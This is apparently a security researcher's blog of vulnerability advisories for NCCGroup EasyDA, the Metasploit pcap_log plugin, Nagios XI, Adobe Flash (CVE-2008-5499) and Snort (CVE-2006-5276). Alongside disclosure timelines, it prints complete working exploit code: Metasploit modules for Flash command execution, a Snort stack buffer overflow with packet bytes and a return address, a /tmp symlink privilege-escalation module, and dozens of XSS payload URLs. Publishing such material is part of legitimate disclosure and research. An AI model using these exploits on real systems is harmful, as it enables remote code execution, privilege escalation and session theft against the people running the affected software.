Wednesday 2 April 2014

0A29-14-1 : NCCGroup EasyDA privilege escalation & credential disclosure vulnerability [0day]

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
_______          ________  ________  _____  _______
\   _  \ _____   \_____  \/   __   \/  |  | \   _  \
/  /_\  \\__  \   /  ____/\____    /   |  |_/  /_\  \
\  \_/   \/ __ \_/       \   /    /    ^   /\  \_/   \
 \_____  (____  /\_______ \ /____/\____   |  \_____  /
       \/     \/         \/            |__|        \/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

0A29-14-1 : NCCGroup EasyDA privilege escalation & credential
disclosure vulnerability [0day]

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Description:
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

EasyDA by NCCGroup uses /tmp in an insecure manner.
1) Domain Admin credentials can be obtained by a low-privileged user
2) A low-privileged user can escalate to the user which runs EasyDA

https://github.com/nccgroup/easyda

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Timeline:
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

22 June  2013 - Reported
24 June  2013 - Acknowledged
20 March 2014 - NCCGroup publish an insecure temp priv-esc in Nessus (plugin)
20 March 2014 - 0a2940 remembers about EasyDa......
02 April 2014 - Published (with extra-special ascii :-))

https://www.nccgroup.com/media/481256/ncc00643-technical-advisory-nessus-authenticated-scan-local-privilege-escalation.pdf

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Details:
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Many problems
e.g.
      cat "$HASHFILE" |cut -d ":" -f 1 >/tmp/user.txt

      cat "$HASHFILE" |cut -d ":" -f 3,4 >/tmp/pass.txt

      paste /tmp/user.txt /tmp/pass.txt >/tmp/userpass.txt

etc.

More info:
https://www.securecoding.cert.org/confluence/display/seccode/FIO21-C.+Do+not+create+temporary+files+in+shared+directories
Posted by at No comments:

Monday 16 July 2012

0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

UPDATED 29 October 2012

Finessed exploit now included in metasploit -

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/escalate/metasploit_pcaplog.rb

================
0A29-12-2 : Metasploit 'pcap_log' plugin  privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges

================
Timeline:
================

16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure

================
Details:
================

By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.

Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)

======
Sample PoC (needs work)

modules/post/linux/exploit/metasploit_pcaplog.rb
======

# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

    include Msf::Post::Common
    include Msf::Post::File
    include Msf::Post::Linux::System

    def initialize(info={})
        super( update_info( info,
                'Name'          => 'Metasploit plugin "pcap_log" arbirary file overwrite / privilege escalation',
                'Description'   => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
                            Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data
                            that you wish to appear in the file.},
          
                'License'       => MSF_LICENSE,
                'Author'        => [ '0a29406d9794e4f9b30b3c5d6702c708'],
                'Version'       => '$Revision$',
                'Platform'      => [ 'linux' ],
                'SessionTypes'  => [ 'shell', 'meterpreter' ],
                'References' =>
                                [
                                        [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
                                        [ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
                                ],
                'DisclosureDate'=> "July 16 2012"

            ))
                register_options([
            OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
                        OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
                ], self.class)

    end

    def link(t)
        file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
                    "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
                        ]
                fname = ::File.join("/tmp", file_part)
        retval =  session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
    end

    # Run Method for when run command is issued
    def run
        for i in 0..(datastore['NUMBER'])
            link(Time.now+i)
        end
        print_status("Set #{datastore['NUMBER']} links.")
    end

    def cleanup
        print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
    end
end
Posted by at No comments:

Thursday 14 June 2012

0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0


================
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Multiple reflected XSS vulnerabilities exist within Nagios XI < 2011R3.0

Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT

================
Timeline:
================

16 May 2012 - Reported to Nagios Enterprises
16 May 2012 - Acknowledged
16 May 2012 - Reported fixed
04 June 2012 - Nagios XI 2011R3.0 released
14 June 2012 - Public disclosure

================
Details:
================

Page: /includes/components/graphexplorer/visApi.php
POC: http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=</script><script>alert('0a29')</script>&opt=topalerts

Page: /nagiosxi/perfgraphs/index.php
POC: http://site/nagiosxi/perfgraphs/index.php?view='><script>alert('0a29')</script>&start=&end=&startdate=&enddate=
Posted by at No comments:

Wednesday 16 May 2012

CVE-2008-5499 : modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb 


<code>
/*
Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
Author:  0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
PoC:  http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
*/

import flash.external.ExternalInterface;

class Exploit {

 public function randname(newLength:Number):String{
  var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
  var alphabet:Array = a.split("");
  var randomLetter:String = "";

  for (var i:Number = 0; i < newLength; i++){
   randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
  }

  return randomLetter;
 }

 public function exploit() {
  var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
  var loadVars:LoadVars = new LoadVars();

  loadVars.onData = function(str:String):Void {
   if (str) {
    if (_global.ASnative(2201, 1)("airappinstaller")) {
     _global.ASnative(2201, 2)("airappinstaller", "; " + str);
    }
   } else {
    // FAIL
   }
  }
  loadVars.load(path);
 }

 public function Exploit() {
  exploit();
 }

 static function main() {
  var ex : Exploit;
  ex = new Exploit();
 }
}




##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
   'Description'    => %q{
     This module exploits a vulnerability in Adobe Flash Player for Linux,
     version  10.0.12.36 and 9.0.151.0 and prior.
     An input validation vulnerability allows command execution when the browser
     loads a SWF file which contains shell metacharacters in the arguments to
     the ActionScript launch method.

     The victim must have Adobe AIR installed for the exploit to work. This module
     was tested against version 10.0.12.36 (10r12_36).
    },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
    ],
   'References'     =>
    [
     ['CVE', '2008-5499'],
     ['OSVDB', '50796'],
     ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
     ['URL', 'http://www.securityfocus.com/bid/32896/exploit']
    ],
   'DefaultOptions' =>
    {
     'HTTP::compression' => 'gzip',
     'HTTP::chunked'     => true
    },
   'Platform'       => 'unix', # so unix cmd exec payloads are ok
   'Arch'           => ARCH_CMD,
   'Targets'        =>
    [
     [ 'Automatic', {}],
    ],
   'DisclosureDate' => 'Dec 17 2008',
   'DefaultTarget'  => 0))

 end

 def exploit
  path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
  fd = File.open( path, "rb" )
  @swf = fd.read(fd.stat.size)
  fd.close

  super
 end

 def on_request_uri(cli, request)
  msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
  trigger = @swf
  trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

  obj_id = rand_text_alpha(rand(6)+3)

  if request.uri.match(/\.swf/i)
   print_status("#{msg} Sending Exploit SWF")
   send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
   return
  end

  if request.uri.match(/\.txt/i)
   send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
   return
  end

  html =  <<-EOS
  <html>
   <head>
   </head>
   <body>
   <center>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{get_resource}#{trigger_file}" />
    <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
     type="application/x-shockwave-flash"
     pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>

   </object>
  </center>

  </body>
  </html>
  EOS

  print_status("#{msg} Sending HTML...")
  send_response(cli, html, { 'Content-Type' => 'text/html' })
 end
end




</code>










Posted by



at





No comments:
  










































CVE-2006-5276 : modules/exploits/linux/ids/snortdcerpc.rb













##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Capture

def initialize(info = {})
      super(update_info(info,
      'Name'           => 'Snort 2.6.1. DCE/RPC Packet Reassembly Stack Buffer Overflow (Linux x86)',
      'Description'    => %q{
              This exploits the buffer overflow found in Snort 2.6.1 DCE/RPC
              packet processor. This particular module is capable of
              exploiting the flaw on x86 Linux systems that do not have the
              noexec stack option set.
      },
      'Author'         => [
              'Trirat Puttaraksa', #POC
              '0a29406d9794e4f9b30b3c5d6702c708' #module
      ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
      [
              [ 'CVE', '2006-5276' ],
              [ 'OSVDB', '32094' ],
              [ 'BID', '22616' ],
              [ 'URL', 'http://iss.net/threats/257.html' ],
              [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html']
      ],
      'Privileged'     => true,
      'Payload'        =>
      {
              'BadChars' => "\x00",
      },
      'Platform'       => 'linux',
      'Targets'        =>
      [
              [ 'Snort 2.6.1 - Redhat 8',
              {
                      'Ret' => 0xbffff120,
                      'Arch' => [ ARCH_X86 ],
                      'Space' => 124,
              }
              ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 19 2007'
      ))
      register_options([
                      OptString.new('INTERFACE', [true, 'The interface to inject the packet','eth0']),
                      OptAddress.new('DSTIP', [true, 'The destination IP address']),
                      OptAddress.new('SRCIP', [true, 'The source IP address']),

                      ], self.class)

      deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')

      end

      def exploit

      begin
       check_pcaprub_loaded

       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = "\x00\x00\x04\xab"

       # SMB Header -
       smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
       smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
       smbreq += "\x00\x08\x30\x00"

       # Tree Connect AndX Request
       smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
       smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
       smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
       smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"

       # NT Create AndX Request
       smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
       smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
       smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
       smbreq += "\x63\x00\x00\x00"

       # Write AndX Request #1
       smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
       smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
       smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
       smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
       smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
       smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"

       # Write AndX Request #2
       smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
       smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
       smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"

       # The following address overwrites RET and points into our shellcode
       smbreq += [target.ret].pack('V')
       smbreq += "\xcc" * 16 #pad
       smbreq += "\x90" * 4  #land
       enc = payload.encoded
       smbreq += enc
       smbreq += "\x90" * (334 - enc.length) #pad

       p = PacketFu::TCPPacket.new
       p.ip_saddr = datastore['SRCIP']
       p.ip_daddr = datastore['DSTIP']
       p.tcp_sport = 139
       p.tcp_flags.ack = 1
       p.tcp_flags.psh = 1
       p.tcp_dport = 139
       p.tcp_win = 3072
       p.payload = smbreq
       p.recalc
       p

       print_status("Sending DCE/RPC packet from #{p.ip_saddr}:#{p.tcp_sport} to #{p.ip_daddr}:#{p.tcp_dport} ")
       open_pcap
       interface = datastore['INTERFACE']
       capture.inject(p.to_s)
       close_pcap

       rescue ::Exception => e
          print_error("Failed: #{e}")
       end
      end

end










Posted by



at





No comments:
  


































          

        

          

        

Wednesday 14 December 2011


          

        









0A29-11-4 : Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9










================

Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9



Author: 0a29406d9794e4f9b30b3c5d6702c708



twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================

Description:

================



Multiple privilege escalations exist within Nagios XI installer. 



Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in 

http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)



================

Timeline:

================



16 November 2011 - Reported to Nagios Enterprises

16 November 2011 - Acknowledged

13 December 2011 - Nagios XI 2011R1.9 released

14 December 2011 - Nagios Enterprises report fixed

14 December 2011 - Public disclosure



================

Details:

================



Vulnerability 1: Arbitrary RPM installation

-----

Files:

    0-yum

    1-prereqs



In certain situations files matching /tmp/epel-release*.rpm , /tmp/rpmforge-release*.rpm

 and /tmp/php-pear-HTML-Template-IT*.rpm will be installed.



e.g. from e0-yum:



if ! rpm -q epel-release &>/dev/null; then

        <snip>

                cd /tmp

        <snip>       

        rpm -Uvh epel-release*.rpm

-----



Vulnerability 2: Arbitrary crontab intallation

-----

Files:

    install-crontab-root 

    install-crontab-nagios

    uninstall-crontab-nagios



A malicious user can exploit a race condition to control the root and nagios user's 

crontab. By creating the temporary file in advance (to control permissions) an attacker 

can insert entries before it is used to update the crontab.



e.g. from install-crontab-root:

---

#!/bin/sh



crontab -l -u root | grep -v "/usr/local/nagiosxi/" > /tmp/root.crontab.new

cat nagiosxi/crontab.root >> /tmp/root.crontab.new



crontab -u root /tmp/root.crontab.new



rm -f /tmp/root.crontab.new









Posted by



at





No comments:
  










































0A29-11-3 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9










================

Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9



Author: 0a29406d9794e4f9b30b3c5d6702c708



twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================

Description:

================



Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this

list is non-exhaustive, due to the sheer number of issues. Of particular note

is XSS on the login page, and the ability to pass XSS through the login page, 

using the redirect parameter, e.g. 

http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>



Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in 

http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)



================

Timeline:

================



16 November 2011 - Reported to Nagios Enterprises

16 November 2011 - Acknowledged

13 December 2011 - Nagios XI 2011R1.9 released

14 December 2011 - Nagios Enterprises report fixed

14 December 2011 - Public disclosure



================

Details:

================



Reflected XSS

-----



Page:        /nagiosxi/login.php

Variables:    - 

PoCs:        http://site/nagiosxi/login.php/";alert('0a29');"

Details:    The URL is copied into JavaScript variable 'backend_url' in an unsafe 

        manner 

        Also affects:

        /nagiosxi/about/index.php

        /nagiosxi/about/index.php

        /nagiosxi/about/main.php

        /nagiosxi/account/main.php

        /nagiosxi/account/notifymethods.php

        /nagiosxi/account/notifymsgs.php

        /nagiosxi/account/notifyprefs.php

        /nagiosxi/account/testnotification.php

        /nagiosxi/help/index.php

        /nagiosxi/help/main.php

        /nagiosxi/includes/components/alertstream/go.php

        /nagiosxi/includes/components/alertstream/index.php

        /nagiosxi/includes/components/hypermap_replay/index.php

        /nagiosxi/includes/components/massacknowledge/mass_ack.php

        /nagiosxi/includes/components/xicore/recurringdowntime.php/

        /nagiosxi/includes/components/xicore/status.php

        /nagiosxi/includes/components/xicore/tac.php

        /nagiosxi/reports/alertheatmap.php

        /nagiosxi/reports/availability.php

        /nagiosxi/reports/eventlog.php

        /nagiosxi/reports/histogram.php

        /nagiosxi/reports/index.php

        /nagiosxi/reports/myreports.php

        /nagiosxi/reports/nagioscorereports.php

        /nagiosxi/reports/notifications.php

        /nagiosxi/reports/statehistory.php

        /nagiosxi/reports/topalertproducers.php

        /nagiosxi/views/index.php

        /nagiosxi/views/main.php



Page:        /nagiosxi/account/

Variables:    xiwindow

PoCs:        http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>



Page:        /nagiosxi/includes/components/massacknowledge/mass_ack.php

Variables:    -

PoCs:        http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>



Page:        /nagiosxi/includes/components/xicore/status.php

Variables:    hostgroup, style

PoCs:        http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>

        http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>



Page:        /nagiosxi/includes/components/xicore/recurringdowntime.php

Variables:    -

PoCs:        http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>





Page:        /nagiosxi/reports/alertheatmap.php

Variables:    height, host, service, width

PoCs:        http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>

        http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>

        http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>

        http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>



Page:        /nagiosxi/reports/histogram.php

Variable:    service

PoCs:        http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>



Page:        /nagiosxi/reports/notifications.php

Variables:    host, service

PoCs:        http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>

        http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>



Page:        /nagiosxi/reports/statehistory.php

Variables:    host, service

PoCs:        http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>

        http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>





Stored XSS

-----



Page:        /nagiosxi/reports/myreports.php

Variable:    title

Details:    It is possible to store XSS within 'My Reports', however it is believed this 

        is only viewable by the logged-in user.

        1) View a report and save it, e.g.

        http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D

        2) Name the report with XSS, e.g. "><script>alert("0a29")</script>









Posted by



at





No comments:
  


































        

      









Subscribe to:
Posts (Atom)